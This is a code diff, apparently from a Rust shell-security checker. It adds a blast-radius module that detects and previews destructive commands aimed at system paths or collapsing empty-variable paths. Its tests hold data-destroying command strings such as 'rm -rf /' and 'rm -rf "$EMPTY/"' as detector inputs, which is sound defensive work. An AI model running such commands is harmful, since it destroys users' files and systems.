+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        record_at(&store, key("rule_a")).unwrap();
+        record_at(&store, key("rule_a")).unwrap();
+        assert_eq!(entry_count_at(&store), 2);
+
+        let removed = reset_at(&store).unwrap();
+        assert_eq!(removed, 2);
+        assert_eq!(entry_count_at(&store), 0);
+        assert!(lookup_at(&store, &key("rule_a")).first_time);
+    }
+
+    #[test]
+    fn reset_on_absent_store_is_zero() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        assert_eq!(reset_at(&store).unwrap(), 0);
+    }
+
+    #[test]
+    fn salt_is_persisted_and_stable() {
+        let dir = tempdir().unwrap();
+        let salt_file = salt_in(dir.path());
+        let h1 = hash_host_at(&salt_file, "github.com");
+        // A second call reuses the persisted salt → same hash.
+        let h2 = hash_host_at(&salt_file, "github.com");
+        assert_eq!(h1, h2);
+        assert!(salt_file.exists(), "salt must be persisted");
+        // Host hash is 16 hex chars; never the raw host.
+        assert_eq!(h1.len(), 16);
+        assert!(!h1.contains("github"));
+    }
+
+    #[test]
+    fn host_hash_is_case_insensitive() {
+        let dir = tempdir().unwrap();
+        let salt_file = salt_in(dir.path());
+        assert_eq!(
+            hash_host_at(&salt_file, "GitHub.com"),
+            hash_host_at(&salt_file, "github.com")
+        );
+    }
+
+    #[test]
+    fn different_salts_give_different_hashes() {
+        let dir1 = tempdir().unwrap();
+        let dir2 = tempdir().unwrap();
+        let h1 = hash_host_at(&salt_in(dir1.path()), "github.com");
+        let h2 = hash_host_at(&salt_in(dir2.path()), "github.com");
+        assert_ne!(h1, h2, "per-install salt must diverge hashes");
+    }
+
+    #[test]
+    fn cwd_hash_is_8_chars_and_not_raw_path() {
+        let dir = tempdir().unwrap();
+        let salt_file = salt_in(dir.path());
+        let h = hash_cwd_at(&salt_file, Some("/home/alice/secret-project")).unwrap();
+        assert_eq!(h.len(), 8);
+        assert!(!h.contains("alice"));
+        assert!(!h.contains("secret"));
+    }
+
+    #[test]
+    fn corrupt_line_is_skipped_not_fatal() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        std::fs::write(
+            &store,
+            "not json\n{\"rule_id\":\"curl_pipe_shell\",\"sudo_flag\":false,\"seen_at\":\"2099-01-01T00:00:00Z\"}\n\n",
+        )
+        .unwrap();
+        // The one valid (future-dated, in-window) row counts; the junk is skipped.
+        let k = PatternKey {
+            rule_id: "curl_pipe_shell".to_string(),
+            host_hash: None,
+            ecosystem: None,
+            sudo_flag: false,
+            cwd_repo_hash: None,
+        };
+        assert_eq!(lookup_at(&store, &k).count, 1);
+    }
+
+    #[test]
+    fn observation_roundtrips_through_json() {
+        let obs = Observation {
+            rule_id: "curl_pipe_shell".to_string(),
+            host_hash: Some("abc".to_string()),
+            ecosystem: Some("npm".to_string()),
+            sudo_flag: true,
+            cwd_repo_hash: Some("def".to_string()),
+            seen_at: "2026-01-01T00:00:00+00:00".to_string(),
+        };
+        let json = serde_json::to_string(&obs).unwrap();
+        let back: Observation = serde_json::from_str(&json).unwrap();
+        assert_eq!(obs, back);
+    }
+}

--- a/crates/tirith-core/src/blast_radius.rs
+++ b/crates/tirith-core/src/blast_radius.rs
@@ -1,0 +1,1097 @@
+//! Blast-radius simulator (M10 ch1).
+//!
+//! # Hot / cold split (load-bearing)
+//!
+//! This module ships TWO distinct surfaces with very different cost profiles,
+//! and the split is the whole point of the chunk:
+//!
+//!   * [`cheap_check`] — pure **string-shape** analysis. No filesystem access,
+//!     no glob expansion, no `stat`. It inspects the parsed command leader and
+//!     its target arguments and fires a small set of blast-radius rules when a
+//!     target is obviously dangerous by shape alone (`/`, `/home`, `/usr`,
+//!     `~`, or a `"$VAR/"` glob where `VAR` resolves to empty). This is the
+//!     ONLY surface the `engine::analyze` exec/paste hot path is allowed to
+//!     call (see the `analyze` doc-comment). It is gated at tier-1 by the
+//!     `destructive_fs_op` PATTERN_TABLE entry.
+//!
+//!   * [`simulate`] — the full simulator. It **walks the filesystem** (capped
+//!     at depth 5 / 100k files), expands globs against the cwd, counts files /
+//!     dirs / symlinks, finds the largest file, and decides whether the targets
+//!     escape the repo or write a system path. It is EXPENSIVE and reads the
+//!     disk, so it runs ONLY under explicit `tirith preview -- "<cmd>"`. It is
+//!     NEVER reachable from `tirith check` / the shell-hook hot path.
+//!
+//! # `$VAR` resolution
+//!
+//! The empty-variable glob bug (`rm -rf "$EMPTY/"` with `EMPTY` unset →
+//! `rm -rf "/"`) is detected against an injected variable map rather than
+//! reading `std::env` directly inside the detector, so unit tests can drive
+//! the empty-var case without mutating the process environment (the libc
+//! `setenv` race — see PR #125). Production callers pass a snapshot of
+//! `std::env::vars()` via [`env_snapshot`].
+
+use crate::tokenize::{self, ShellType};
+use crate::verdict::{Evidence, Finding, RuleId, Severity};
+use std::collections::HashMap;
+use std::path::{Path, PathBuf};
+
+/// Maximum directory-walk depth for [`simulate`]. The simulator never descends
+/// deeper than this many levels below a target root.
+pub const MAX_WALK_DEPTH: usize = 5;
+
+/// Maximum number of files [`simulate`] will count before stopping the walk.
+/// Protects against pathological trees (and a `rm -rf /` style target).
+pub const MAX_FILE_COUNT: usize = 100_000;
+
+/// File-count threshold above which [`RuleId::BlastLargeFileCount`] (Info)
+/// fires from a simulation.
+pub const LARGE_FILE_COUNT_THRESHOLD: u64 = 1000;
+
+/// Result of a full filesystem simulation. Produced ONLY by [`simulate`]
+/// (i.e. only under `tirith preview`).
+#[derive(Debug, Clone, Default, serde::Serialize)]
+pub struct BlastReport {
+    /// Regular files counted within the resolved targets (capped at
+    /// [`MAX_FILE_COUNT`]).
+    pub file_count: u64,
+    /// Directories counted within the resolved targets.
+    pub dir_count: u64,
+    /// Symlinks encountered (counted, never followed).
+    pub symlink_count: u64,
+    /// The largest regular file found, as `(path, size_bytes)`.
+    pub largest_file: Option<(String, u64)>,
+    /// True when any resolved target escapes the repo root (or there is no repo
+    /// root and the target is absolute / climbs above the cwd).
+    pub paths_outside_repo: bool,
+    /// True when any resolved target is (or is under) a well-known system path.
+    pub writes_system_path: bool,
+    /// Number of paths a glob argument expanded to against the cwd.
+    pub glob_expansion_count: u64,
+    /// True when a `"$VAR/"`-shaped argument resolved to an empty variable,
+    /// collapsing to a root-ish path (`rm -rf "$EMPTY/"` → `rm -rf "/"`).
+    pub unsafe_empty_var_glob: bool,
+    /// True when the walk hit [`MAX_FILE_COUNT`] / [`MAX_WALK_DEPTH`] and the
+    /// counts are therefore lower bounds, not exact.
+    pub walk_truncated: bool,
+}
+
+/// A destructive filesystem operation recognized by the blast-radius surface.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+enum FsOp {
+    /// `rm` (delete).
+    Rm,
+    /// `mv` (move / rename — the source is removed).
+    Mv,
+    /// `chmod` (recursive permission change is the dangerous shape).
+    Chmod,
+    /// `find … -delete`.
+    FindDelete,
+    /// `rsync --delete` (mirror delete on the destination side).
+    RsyncDelete,
+}
+
+/// A parsed destructive invocation: the operation plus the non-flag target
+/// arguments (quotes stripped) in command order.
+struct ParsedFsOp {
+    op: FsOp,
+    /// `true` when the invocation carries a recursive flag (`-r`/`-R`/
+    /// `--recursive`) — only meaningful for `rm`/`chmod`.
+    recursive: bool,
+    /// Target operands (paths / globs), quote-stripped, in order.
+    targets: Vec<String>,
+}
+
+/// Snapshot the current process environment into a map suitable for the
+/// `env_map` parameter of [`cheap_check`] / [`simulate`]. Call this ONCE in the
+/// caller (never inside the detector) so the detector stays pure and testable.
+pub fn env_snapshot() -> HashMap<String, String> {
+    std::env::vars().collect()
+}
+
+/// Cheap, filesystem-free blast-radius check for the hot path.
+///
+/// Returns findings for the string-shape-only rules:
+///   * [`RuleId::BlastWritesSystemPath`] (High) — target is `/`, `/home`,
+///     `/usr`, `/etc`, … by literal shape.
+///   * [`RuleId::BlastEmptyVarGlob`] (High) — a `"$VAR/"`-shaped target where
+///     `VAR` resolves to empty in `env_map`.
+///   * [`RuleId::BlastFindDelete`] (Medium) — `find … -delete`.
+///   * [`RuleId::BlastRsyncDelete`] (Medium) — `rsync --delete`.
+///
+/// Does NOT touch the filesystem, expand globs, or count anything. The
+/// simulator-only signals ([`RuleId::BlastDeletesOutsideRepo`],
+/// [`RuleId::BlastSymlinkTraversal`], [`RuleId::BlastLargeFileCount`]) are
+/// produced exclusively by [`simulate`] under `tirith preview`.
+pub fn cheap_check(
+    input: &str,
+    shell: ShellType,
+    env_map: &HashMap<String, String>,
+) -> Vec<Finding> {
+    let mut findings = Vec::new();
+    let segments = tokenize::tokenize(input, shell);
+
+    for seg in &segments {
+        let Some(parsed) = parse_fs_op(seg) else {
+            continue;
+        };
+
+        // `find … -delete` / `rsync --delete` are advisory in their own right —
+        // surface them even when the targets are not obviously system paths,
+        // because the recursive sweep is the hazard.
+        match parsed.op {
+            FsOp::FindDelete => {
+                findings.push(finding(
+                    RuleId::BlastFindDelete,
+                    Severity::Medium,
+                    "find with -delete recursively removes matching files",
+                    "A `find … -delete` traverses the directory tree and unlinks every \
+                     matching entry. Run `tirith preview` to see how many files this would \
+                     remove before executing it.",
+                    Evidence::CommandPattern {
+                        pattern: "find … -delete".to_string(),
+                        matched: seg.raw.clone(),
+                    },
+                ));
+            }
+            FsOp::RsyncDelete => {
+                findings.push(finding(
+                    RuleId::BlastRsyncDelete,
+                    Severity::Medium,
+                    "rsync --delete removes files on the destination not present in the source",
+                    "A mirror with `rsync --delete` deletes anything in the destination that \
+                     is not in the source. A wrong source/destination pair can wipe the \
+                     destination. Run `tirith preview` to see the impact.",
+                    Evidence::CommandPattern {
+                        pattern: "rsync --delete".to_string(),
+                        matched: seg.raw.clone(),
+                    },
+                ));
+            }
+            FsOp::Rm | FsOp::Mv | FsOp::Chmod => {}
+        }
+
+        for target in &parsed.targets {
+            // Empty-`$VAR/` glob: `rm -rf "$EMPTY/"` collapses to `rm -rf "/"`.
+            if let Some(var) = empty_var_glob_var(target, env_map) {
+                findings.push(finding(
+                    RuleId::BlastEmptyVarGlob,
+                    Severity::High,
+                    "destructive command targets an empty-variable path that collapses to root",
+                    "An argument of the shape `\"$VAR/\"` where `VAR` is unset/empty expands to \
+                     `\"/\"`, so this command would operate on the filesystem root. Quote-and-set \
+                     the variable, or guard with `${VAR:?must be set}`.",
+                    Evidence::Text {
+                        detail: format!(
+                            "argument '{target}' references empty variable '${var}' → collapses to a root path"
+                        ),
+                    },
+                ));
+                continue;
+            }
+
+            // The spec scopes the destructive set to `chmod -R` specifically:
+            // a non-recursive `chmod 0644 /etc/foo.conf` touches one file, not
+            // a system tree, so it does not trip the system-path rule. `rm` /
+            // `mv` / `find -delete` / `rsync --delete` always check.
+            if parsed.op == FsOp::Chmod && !parsed.recursive {
+                continue;
+            }
+
+            if is_system_path(target) {
+                findings.push(finding(
+                    RuleId::BlastWritesSystemPath,
+                    Severity::High,
+                    "destructive command targets a system path",
+                    "This destructive command targets a broad system path (root, a home \
+                     tree, or a system directory). Even when intentional this routinely \
+                     breaks the OS or removes other users' data. Run `tirith preview` to \
+                     see the exact impact first.",
+                    Evidence::Text {
+                        detail: format!("target '{target}' is a system path"),
+                    },
+                ));
+            }
+        }
+    }
+
+    dedup_findings(findings)
+}
+
+/// Full filesystem simulation for `tirith preview`. Walks the cwd-relative
+/// targets (capped at [`MAX_WALK_DEPTH`] / [`MAX_FILE_COUNT`]), expands globs,
+/// counts files / dirs / symlinks, finds the largest file, and decides repo /
+/// system-path escape.
+///
+/// `cwd` is the directory globs and relative paths resolve against. `repo_root`
+/// (when known) is the boundary used to decide [`BlastReport::paths_outside_repo`];
+/// `None` means any absolute target / `..`-escape counts as outside.
+pub fn simulate(
+    input: &str,
+    shell: ShellType,
+    cwd: &Path,
+    repo_root: Option<&Path>,
+    env_map: &HashMap<String, String>,
+) -> BlastReport {
+    let mut report = BlastReport::default();
+    let segments = tokenize::tokenize(input, shell);
+
+    for seg in &segments {
+        let Some(parsed) = parse_fs_op(seg) else {
+            continue;
+        };
+
+        for target in &parsed.targets {
+            // Empty-var glob collapses to root — record and skip the walk (we
+            // do NOT walk `/`).
+            if empty_var_glob_var(target, env_map).is_some() {
+                report.unsafe_empty_var_glob = true;
+                report.paths_outside_repo = true;
+                report.writes_system_path = true;
+                continue;
+            }
+
+            if is_system_path(target) {
+                report.writes_system_path = true;
+            }
+
+            // Expand the target (glob against cwd, else literal) into concrete
+            // paths.
+            let expanded = expand_target(target, cwd);
+            if expanded.len() > 1 || target_is_glob(target) {
+                report.glob_expansion_count += expanded.len() as u64;
+            }
+
+            for path in expanded {
+                if path_escapes_repo(&path, cwd, repo_root) {
+                    report.paths_outside_repo = true;
+                }
+                walk_into(&path, cwd, &mut report);
+            }
+        }
+    }
+
+    report
+}
+
+/// Build the findings a `tirith preview` simulation surfaces, given a
+/// [`BlastReport`] and the cheap string-shape findings. The simulator-only
+/// rules ([`RuleId::BlastDeletesOutsideRepo`], [`RuleId::BlastSymlinkTraversal`],
+/// [`RuleId::BlastLargeFileCount`]) are emitted here; the cheap rules come from
+/// [`cheap_check`] and are merged in by the caller.
+pub fn report_findings(report: &BlastReport) -> Vec<Finding> {
+    let mut findings = Vec::new();
+
+    if report.paths_outside_repo && !report.unsafe_empty_var_glob {
+        findings.push(finding(
+            RuleId::BlastDeletesOutsideRepo,
+            Severity::High,
+            "destructive command reaches outside the repository",
+            "At least one resolved target is outside the current repository (or above the \
+             current directory). A destructive operation here can affect files you did not \
+             intend to touch.",
+            Evidence::Text {
+                detail: "one or more targets resolve outside the repo root".to_string(),
+            },
+        ));
+    }
+
+    if report.symlink_count > 0 {
+        findings.push(finding(
+            RuleId::BlastSymlinkTraversal,
+            Severity::Medium,
+            "destructive command's target tree contains symlinks",
+            "The target tree contains symbolic links. Depending on the tool and flags, a \
+             destructive operation may traverse a link and affect files outside the visible \
+             tree. Review the links before proceeding.",
+            Evidence::Text {
+                detail: format!(
+                    "{} symlink(s) found in the target tree",
+                    report.symlink_count
+                ),
+            },
+        ));
+    }
+
+    if report.file_count > LARGE_FILE_COUNT_THRESHOLD {
+        findings.push(finding(
+            RuleId::BlastLargeFileCount,
+            Severity::Info,
+            "destructive command affects a large number of files",
+            "This operation would touch more than 1000 files. That is not necessarily wrong, \
+             but it is large enough to be worth a second look.",
+            Evidence::Text {
+                detail: format!(
+                    "{}{} file(s) in the target tree",
+                    report.file_count,
+                    if report.walk_truncated { "+" } else { "" }
+                ),
+            },
+        ));
+    }
+
+    findings
+}
+
+// ---------------------------------------------------------------------------
+// Parsing
+// ---------------------------------------------------------------------------
+
+/// Parse a single tokenized segment into a destructive-op descriptor, or `None`
+/// when the leader is not a recognized destructive command.
+fn parse_fs_op(seg: &tokenize::Segment) -> Option<ParsedFsOp> {
+    let leader = seg.command.as_deref()?;
+    let leader = leader_name(leader);
+
+    match leader {
+        "rm" => Some(parse_simple(FsOp::Rm, &seg.args)),
+        "mv" => Some(parse_simple(FsOp::Mv, &seg.args)),
+        "chmod" => Some(parse_simple(FsOp::Chmod, &seg.args)),
+        "find" => parse_find(&seg.args),
+        "rsync" => parse_rsync(&seg.args),
+        _ => None,
+    }
+}
+
+/// Strip a leading path component from a leader so `/bin/rm` matches `rm`.
+fn leader_name(leader: &str) -> &str {
+    leader.rsplit(['/', '\\']).next().unwrap_or(leader)
+}
+
+/// Parse `rm` / `mv` / `chmod`: collect non-flag operands, note recursion.
+/// For `chmod` the first non-flag operand is the mode (e.g. `0755`, `u+x`) and
+/// is dropped from the target list.
+fn parse_simple(op: FsOp, args: &[String]) -> ParsedFsOp {
+    let mut recursive = false;
+    let mut targets = Vec::new();
+    let mut after_double_dash = false;
+    let mut seen_mode = false;
+
+    for arg in args {
+        let a = strip_outer_quotes(arg);
+        if after_double_dash {
+            targets.push(a.to_string());
+            continue;
+        }
+        if a == "--" {
+            after_double_dash = true;
+            continue;
+        }
+        if a.starts_with('-') && a.len() > 1 {
+            if is_recursive_flag(a) {
+                recursive = true;
+            }
+            continue;
+        }
+        if op == FsOp::Chmod && !seen_mode {
+            // First positional arg to chmod is the mode, not a target.
+            seen_mode = true;
+            continue;
+        }
+        targets.push(a.to_string());
+    }
+
+    ParsedFsOp {
+        op,
+        recursive,
+        targets,
+    }
+}
+
+/// Parse `find`: only treat it as destructive when a `-delete` action is
+/// present. Targets are the leading path operands (before the first `-`
+/// predicate); default to `.` when none given.
+fn parse_find(args: &[String]) -> Option<ParsedFsOp> {
+    let stripped: Vec<&str> = args.iter().map(|a| strip_outer_quotes(a)).collect();
+    if !stripped.contains(&"-delete") {
+        return None;
+    }
+
+    let mut targets = Vec::new();
+    for a in &stripped {
+        if a.starts_with('-') {
+            break;
+        }
+        targets.push((*a).to_string());
+    }
+    if targets.is_empty() {
+        targets.push(".".to_string());
+    }
+
+    Some(ParsedFsOp {
+        op: FsOp::FindDelete,
+        recursive: true,
+        targets,
+    })
+}
+
+/// Parse `rsync`: only destructive when a `--delete*` flag is present. The
+/// destination (the path side that loses files) is the last non-flag operand.
+fn parse_rsync(args: &[String]) -> Option<ParsedFsOp> {
+    let stripped: Vec<&str> = args.iter().map(|a| strip_outer_quotes(a)).collect();
+    let has_delete = stripped
+        .iter()
+        .any(|a| *a == "--delete" || a.starts_with("--delete-") || *a == "--del");
+    if !has_delete {
+        return None;
+    }
+
+    let operands: Vec<String> = stripped
+        .iter()
+        .filter(|a| !a.starts_with('-'))
+        .map(|a| (*a).to_string())
+        .collect();
+    // The destination is the last operand; that is the side `--delete` prunes.
+    let targets = operands.last().cloned().into_iter().collect();
+
+    Some(ParsedFsOp {
+        op: FsOp::RsyncDelete,
+        recursive: true,
+        targets,
+    })
+}
+
+fn is_recursive_flag(a: &str) -> bool {
+    if a == "--recursive" {
+        return true;
+    }
+    // Bundled short flags, e.g. `-rf`, `-Rf`, `-fr`.
+    if let Some(rest) = a.strip_prefix('-') {
+        if !rest.starts_with('-') {
+            return rest.chars().any(|c| c == 'r' || c == 'R');
+        }
+    }
+    false
+}
+
+// ---------------------------------------------------------------------------
+// String-shape predicates
+// ---------------------------------------------------------------------------
+
+/// Returns the variable name when `arg` is a `"$VAR/"`-shaped path whose
+/// variable resolves to empty (unset or set to `""`) in `env_map`. This is the
+/// empty-var-glob bug: `rm -rf "$EMPTY/"` → `rm -rf "/"`.
+///
+/// Shapes recognized: `$VAR/`, `${VAR}/`, and the bare `$VAR` / `${VAR}` forms
+/// (the trailing slash is the canonical footgun but a bare empty `$VAR` operand
+/// is equally a collapse). The variable must resolve to empty for the rule to
+/// fire — a set variable is a normal expansion and not flagged here.
+fn empty_var_glob_var(arg: &str, env_map: &HashMap<String, String>) -> Option<String> {
+    let rest = arg.strip_prefix('$')?;
+
+    // `${VAR}` / `${VAR}/...` form.
+    let (name, tail) = if let Some(braced) = rest.strip_prefix('{') {
+        let end = braced.find('}')?;
+        let name = &braced[..end];
+        (name, &braced[end + 1..])
+    } else {
+        // `$VAR` / `$VAR/...` form — name runs while alnum/underscore.
+        let end = rest
+            .find(|c: char| !(c.is_ascii_alphanumeric() || c == '_'))
+            .unwrap_or(rest.len());
+        (&rest[..end], &rest[end..])
+    };
+
+    if name.is_empty() {
+        return None;
+    }
+    // The footgun is a variable used as a *path prefix*: the operand is just
+    // the variable, or the variable followed by `/...`. A variable followed by
+    // other text (`$VARsuffix`) is not this shape.
+    if !(tail.is_empty() || tail.starts_with('/')) {
+        return None;
+    }
+
+    let resolved = env_map.get(name).map(String::as_str).unwrap_or("");
+    if resolved.is_empty() {
+        Some(name.to_string())
+    } else {
+        None
+    }
+}
+
+/// Well-known broad system paths recognized by string shape. Mirrors the
+/// `is_broad_path` heuristic in `rules::sudo` plus the bare `~` home shape.
+fn is_system_path(p: &str) -> bool {
+    let p = p.trim();
+    // Bare home expansions.
+    if p == "~" || p == "~/" {
+        return true;
+    }
+    // Exact roots and trailing-slash variants.
+    matches!(
+        p,
+        "/" | "/home"
+            | "/usr"
+            | "/etc"
+            | "/var"
+            | "/opt"
+            | "/srv"
+            | "/lib"
+            | "/bin"
+            | "/sbin"
+            | "/boot"
+            | "/root"
+            | "/sys"
+            | "/proc"
+            | "/dev"
+    ) || matches!(
+        p,
+        "/home/"
+            | "/usr/"
+            | "/etc/"
+            | "/var/"
+            | "/opt/"
+            | "/srv/"
+            | "/lib/"
+            | "/bin/"
+            | "/sbin/"
+            | "/boot/"
+            | "/root/"
+    )
+}
+
+fn target_is_glob(target: &str) -> bool {
+    target.contains('*') || target.contains('?') || target.contains('[')
+}
+
+/// Strip one layer of matching single/double quotes.
+fn strip_outer_quotes(s: &str) -> &str {
+    let b = s.as_bytes();
+    if b.len() >= 2
+        && ((b[0] == b'"' && b[b.len() - 1] == b'"') || (b[0] == b'\'' && b[b.len() - 1] == b'\''))
+    {
+        &s[1..s.len() - 1]
+    } else {
+        s
+    }
+}
+
+// ---------------------------------------------------------------------------
+// Filesystem walk (simulate-only)
+// ---------------------------------------------------------------------------
+
+/// Expand a target into concrete paths. Globs (`*`/`?`/`[`) are expanded against
+/// `cwd` by a single-directory match (we do NOT implement recursive `**`).
+/// Non-glob targets resolve to a single cwd-relative path.
+fn expand_target(target: &str, cwd: &Path) -> Vec<PathBuf> {
+    if target_is_glob(target) {
+        glob_in_cwd(target, cwd)
+    } else {
+        vec![resolve_relative(target, cwd)]
+    }
+}
+
+/// Resolve a possibly-relative / `~`-prefixed path against `cwd`. `~` is
+/// expanded from `HOME` when present.
+fn resolve_relative(target: &str, cwd: &Path) -> PathBuf {
+    if let Some(rest) = target.strip_prefix("~/") {
+        if let Some(home) = std::env::var_os("HOME") {
+            return PathBuf::from(home).join(rest);
+        }
+    }
+    let p = PathBuf::from(target);
+    if p.is_absolute() {
+        p
+    } else {
+        cwd.join(p)
+    }
+}
+
+/// Single-level glob: split the pattern into `<dir>/<basename-pattern>`, read
+/// `<dir>`, and keep entries whose name matches the basename pattern. Only the
+/// basename component may contain a wildcard (good enough for the common
+/// `./dist/*` / `*.log` shapes a preview needs).
+fn glob_in_cwd(pattern: &str, cwd: &Path) -> Vec<PathBuf> {
+    let (dir_part, name_part) = match pattern.rsplit_once('/') {
+        Some((d, n)) => (d.to_string(), n.to_string()),
+        None => (String::new(), pattern.to_string()),
+    };
+    let dir = if dir_part.is_empty() {
+        cwd.to_path_buf()
+    } else {
+        resolve_relative(&dir_part, cwd)
+    };
+
+    let mut out = Vec::new();
+    if let Ok(entries) = std::fs::read_dir(&dir) {
+        for entry in entries.flatten() {
+            let name = entry.file_name();
+            let name = name.to_string_lossy();
+            if glob_match(&name_part, &name) {
+                out.push(entry.path());
+            }
+        }
+    }
+    out
+}
+
+/// Minimal glob matcher supporting `*` (any run) and `?` (one char). No
+/// character classes — `[` is treated literally. Sufficient for preview-grade
+/// counting.
+fn glob_match(pattern: &str, text: &str) -> bool {
+    let p: Vec<char> = pattern.chars().collect();
+    let t: Vec<char> = text.chars().collect();
+    // Iterative wildcard match with backtracking on `*`.
+    let (mut pi, mut ti) = (0usize, 0usize);
+    let (mut star, mut mark) = (None::<usize>, 0usize);
+    while ti < t.len() {
+        if pi < p.len() && (p[pi] == '?' || p[pi] == t[ti]) {
+            pi += 1;
+            ti += 1;
+        } else if pi < p.len() && p[pi] == '*' {
+            star = Some(pi);
+            mark = ti;
+            pi += 1;
+        } else if let Some(s) = star {
+            pi = s + 1;
+            mark += 1;
+            ti = mark;
+        } else {
+            return false;
+        }
+    }
+    while pi < p.len() && p[pi] == '*' {
+        pi += 1;
+    }
+    pi == p.len()
+}
+
+/// Decide whether `path` escapes the repo. With a `repo_root`, "escape" means
+/// the canonicalized path is not under the canonicalized root. Without a root,
+/// any absolute path or any path that climbs above `cwd` counts as escaping.
+fn path_escapes_repo(path: &Path, cwd: &Path, repo_root: Option<&Path>) -> bool {
+    let resolved = canonicalize_lexical(path, cwd);
+    match repo_root {
+        Some(root) => {
+            let root = canonicalize_lexical(root, cwd);
+            !resolved.starts_with(&root)
+        }
+        None => {
+            let base = canonicalize_lexical(cwd, cwd);
+            !resolved.starts_with(&base)
+        }
+    }
+}
+
+/// Lexically normalize a path (resolve `.`/`..` components without touching the
+/// filesystem, so it works for paths that do not exist yet). Relative paths are
+/// first joined onto `cwd`.
+fn canonicalize_lexical(path: &Path, cwd: &Path) -> PathBuf {
+    use std::path::Component;
+    let joined = if path.is_absolute() {
+        path.to_path_buf()
+    } else {
+        cwd.join(path)
+    };
+    let mut out = PathBuf::new();
+    for comp in joined.components() {
+        match comp {
+            Component::ParentDir => {
+                out.pop();
+            }
+            Component::CurDir => {}
+            other => out.push(other.as_os_str()),
+        }
+    }
+    out
+}
+
+/// Walk `path` into the report, honoring the depth and file-count caps. A
+/// symlink is counted and never followed. A single file is counted as one file.
+fn walk_into(path: &Path, _cwd: &Path, report: &mut BlastReport) {
+    let meta = match std::fs::symlink_metadata(path) {
+        Ok(m) => m,
+        Err(_) => return, // nonexistent target — nothing to count.
+    };
+
+    if meta.file_type().is_symlink() {
+        report.symlink_count += 1;
+        return;
+    }
+    if meta.is_file() {
+        count_file(path, meta.len(), report);
+        return;
+    }
+    if meta.is_dir() {
+        report.dir_count += 1;
+        walk_dir(path, 1, report);
+    }
+}
+
+fn walk_dir(dir: &Path, depth: usize, report: &mut BlastReport) {
+    if report.file_count >= MAX_FILE_COUNT as u64 {
+        report.walk_truncated = true;
+        return;
+    }
+    let entries = match std::fs::read_dir(dir) {
+        Ok(e) => e,
+        Err(_) => return,
+    };
+    for entry in entries.flatten() {
+        if report.file_count >= MAX_FILE_COUNT as u64 {
+            report.walk_truncated = true;
+            return;
+        }
+        let path = entry.path();
+        let meta = match std::fs::symlink_metadata(&path) {
+            Ok(m) => m,
+            Err(_) => continue,
+        };
+        if meta.file_type().is_symlink() {
+            report.symlink_count += 1;
+            continue; // never follow symlinks.
+        }
+        if meta.is_dir() {
+            report.dir_count += 1;
+            if depth < MAX_WALK_DEPTH {
+                walk_dir(&path, depth + 1, report);
+            } else {
+                report.walk_truncated = true;
+            }
+        } else if meta.is_file() {
+            count_file(&path, meta.len(), report);
+        }
+    }
+}
+
+fn count_file(path: &Path, size: u64, report: &mut BlastReport) {
+    report.file_count += 1;
+    let bigger = report
+        .largest_file
+        .as_ref()
+        .map(|(_, s)| size > *s)
+        .unwrap_or(true);
+    if bigger {
+        report.largest_file = Some((path.display().to_string(), size));
+    }
+}
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+fn finding(
+    rule_id: RuleId,
+    severity: Severity,
+    title: &str,
+    description: &str,
+    evidence: Evidence,
+) -> Finding {
+    Finding {
+        rule_id,
+        severity,
+        title: title.to_string(),
+        description: description.to_string(),
+        evidence: vec![evidence],
+        human_view: None,
+        agent_view: None,
+        mitre_id: None,
+        custom_rule_id: None,
+    }
+}
+
+/// Drop duplicate `(rule_id)` findings, keeping the first occurrence. A command
+/// with multiple system-path targets should surface one finding, not N.
+fn dedup_findings(findings: Vec<Finding>) -> Vec<Finding> {
+    let mut seen = std::collections::HashSet::new();
+    findings
+        .into_iter()
+        .filter(|f| seen.insert(f.rule_id))
+        .collect()
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::fs;
+
+    fn empty_env() -> HashMap<String, String> {
+        HashMap::new()
+    }
+
+    #[test]
+    fn cheap_check_flags_system_path_rm() {
+        let f = cheap_check("rm -rf /home", ShellType::Posix, &empty_env());
+        assert!(
+            f.iter().any(|f| f.rule_id == RuleId::BlastWritesSystemPath),
+            "expected BlastWritesSystemPath, got {:?}",
+            f.iter().map(|f| f.rule_id).collect::<Vec<_>>()
+        );
+    }
+
+    #[test]
+    fn cheap_check_flags_root_slash() {
+        let f = cheap_check("rm -rf /", ShellType::Posix, &empty_env());
+        assert!(f.iter().any(|f| f.rule_id == RuleId::BlastWritesSystemPath));
+    }
+
+    #[test]
+    fn cheap_check_flags_empty_var_glob() {
+        // EMPTY is absent from the map → resolves to empty → collapses to "/".
+        let f = cheap_check("rm -rf \"$EMPTY/\"", ShellType::Posix, &empty_env());
+        assert!(
+            f.iter().any(|f| f.rule_id == RuleId::BlastEmptyVarGlob),
+            "expected BlastEmptyVarGlob, got {:?}",
+            f.iter().map(|f| f.rule_id).collect::<Vec<_>>()
+        );
+    }
+
+    #[test]
+    fn cheap_check_set_var_does_not_fire_empty_var_glob() {
+        let mut env = HashMap::new();
+        env.insert("BUILD".to_string(), "dist".to_string());
+        let f = cheap_check("rm -rf \"$BUILD/\"", ShellType::Posix, &env);
+        assert!(
+            !f.iter().any(|f| f.rule_id == RuleId::BlastEmptyVarGlob),
+            "a set variable must not fire the empty-var rule"
+        );
+    }
+
+    #[test]
+    fn cheap_check_braced_empty_var() {
+        let f = cheap_check("rm -rf \"${MISSING}/\"", ShellType::Posix, &empty_env());
+        assert!(f.iter().any(|f| f.rule_id == RuleId::BlastEmptyVarGlob));
+    }
+
+    #[test]
+    fn cheap_check_flags_find_delete() {
+        let f = cheap_check("find . -type f -delete", ShellType::Posix, &empty_env());
+        assert!(f.iter().any(|f| f.rule_id == RuleId::BlastFindDelete));
+    }
+
+    #[test]
+    fn cheap_check_find_without_delete_is_silent() {
+        let f = cheap_check(
+            "find . -type f -name '*.rs'",
+            ShellType::Posix,
+            &empty_env(),
+        );
+        assert!(f.is_empty(), "find without -delete must not fire");
+    }
+
+    #[test]
+    fn cheap_check_flags_rsync_delete() {
+        let f = cheap_check(
+            "rsync -a --delete src/ dst/",
+            ShellType::Posix,
+            &empty_env(),
+        );
+        assert!(f.iter().any(|f| f.rule_id == RuleId::BlastRsyncDelete));
+    }
+
+    #[test]
+    fn cheap_check_rsync_without_delete_is_silent() {
+        let f = cheap_check("rsync -a src/ dst/", ShellType::Posix, &empty_env());
+        assert!(f.is_empty());
+    }
+
